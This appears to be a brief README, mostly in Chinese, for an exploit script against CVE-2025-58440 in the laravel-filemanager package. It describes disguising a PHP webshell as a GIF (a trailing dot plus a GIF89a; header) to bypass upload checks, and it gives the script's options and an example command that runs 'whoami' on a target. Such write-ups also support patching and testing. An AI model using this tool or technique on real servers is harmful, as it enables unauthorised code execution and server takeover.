
通过多语言文件攻击和空字节注入实现的Laravel FileManager远程代码执行(RCE)
Laravel FileManager 上的多语言文件攻击和空字节注入导致的远程代码执行 (RCE)
unisharp/laravel-filemanager 包的 2.11 版本存在 远程代码执行 (RCE) 漏洞,原因是文件上传时的文件类型验证不当。攻击者可以利用文件扩展名验证的缺陷,上传伪装成 GIF 图像的恶意 PHP 文件。具体来说,攻击者可以在 .php 文件扩展名后附加一个点(.)并包含 GIF89a; 头,使文件看起来像图像,从而绕过验证检查。这使得攻击者能够在服务器上执行任意 PHP 代码,导致 远程代码执行 (RCE)。
python3 CVE-2025-58440.py <target> [--flags]
Laravel File Manager Exploit (CVE-2025-58440)
positional arguments:
target 目标 URL(例如 127.0.0.1:8000)
options:
-h, --help 显示此帮助信息并退出
-C, --cookie COOKIE Session cookie
-d, --directory DIRECTORY 工作目录(默认:/tmp)
-f, --filename FILENAME 要上传的文件名(默认:随机)
-p, --payload COMMAND 通过 webshell 执行的命令(例如 'id', 'whoami')(默认:id)
python3 CVE-2025-58440.py 127.0.0.1:8000 -C "laravel-session=value" -p "whoami"
